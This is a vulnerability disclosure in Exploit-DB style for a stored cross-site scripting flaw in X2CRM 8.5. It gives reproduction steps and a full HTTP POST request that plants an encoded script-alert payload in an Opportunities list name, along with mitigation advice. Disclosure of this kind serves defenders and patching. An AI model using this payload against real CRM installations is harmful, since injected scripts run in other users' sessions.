X2CRM 8.5 - Stored Cross-Site Scripting (XSS)

vendor:

X2CRM

by:

Okan Kurtulus

6.1

CVSS

HIGH

Stored Cross-Site Scripting (XSS)

CWE

Product Name: X2CRM

Affected Version From: X2CRM v8.5

Affected Version To: X2CRM v8.5

Patch Exists: NO

Related CWE: CVE-2024-48120

CPE: a:x2engine:x2crm:8.5

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu 22.04

2024

X2CRM 8.5 – Stored Cross-Site Scripting (XSS)

The X2CRM version 8.5 is vulnerable to a stored cross-site scripting (XSS) exploit. By entering a malicious XSS payload in the 'Name' field while creating a list under the 'Opportunities' section, an attacker can trigger the stored XSS payload when accessing the 'Lists' tab.

Mitigation:

To mitigate this vulnerability, input validation and output encoding should be implemented to prevent the execution of malicious scripts. Regular security updates and monitoring for unusual activities are recommended.

Source

Exploit-DB raw data:

# Exploit Title: X2CRM 8.5 - Stored Cross-Site Scripting (XSS)
# Date: 12 September 2024
# Exploit Author: Okan Kurtulus
# Vendor Homepage: https://x2engine.com/
# Software Link: https://github.com/X2Engine/X2CRM
# Version: X2CRM v8.5
# Tested on: Ubuntu 22.04
# CVE : CVE-2024-48120

1-) Log in to the system with any user account. Navigate to the “Opportunities” section from the top menu and select “Create List.” In the “Name” field of the new screen, enter the malicious XSS payload and click “Create.”

2-) Next, return to the “Opportunities” tab and click on “Lists” again. The stored XSS payload will be triggered.

XSS Trigger Request:

POST /x2crm/x2engine/index.php/opportunities/createList HTTP/1.1
Host: 192.168.1.108
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 390
Origin: http://192.168.1.108
Connection: keep-alive
Referer: http://192.168.1.108/x2crm/x2engine/index.php/opportunities/createList
Cookie: PHPSESSID=uijrtnp42qqo29vfkb4v0sps3i; YII_CSRF_TOKEN=Rkw1SWxTc1dpa0Z0OGdpb1RxY0ZGVDY5X3pPMzVFTDGjgT_kJmGLFkvRCi_Y9OO4f0QIHNTvqbSw1t9UVVXL4g%3D%3D; 5d8630d289284e8c14d15b14f4b4dc28=9d5b82f1240eb47cd73a20df560d9b3086847e33a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%223%22%3Bi%3A1%3Bs%3A4%3A%22test%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; LoginForm[username]=test; LoginForm[rememberMe]=1
Upgrade-Insecure-Requests: 1
Priority: u=0, i

YII_CSRF_TOKEN=Rkw1SWxTc1dpa0Z0OGdpb1RxY0ZGVDY5X3pPMzVFTDGjgT_kJmGLFkvRCi_Y9OO4f0QIHNTvqbSw1t9UVVXL4g%3D%3D&X2List%5Bname%5D=%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E&X2List%5Btype%5D=dynamic&X2List%5BassignedTo%5D=test2&X2List%5Bvisibility%5D=1&X2List%5BlogicType%5D=AND&X2List%5Battribute%5D%5B%5D=alternativeEmail&X2List%5Bcomparison%5D%5B%5D=%3D&X2List%5Bvalue%5D%5B%5D=test&yt0=Create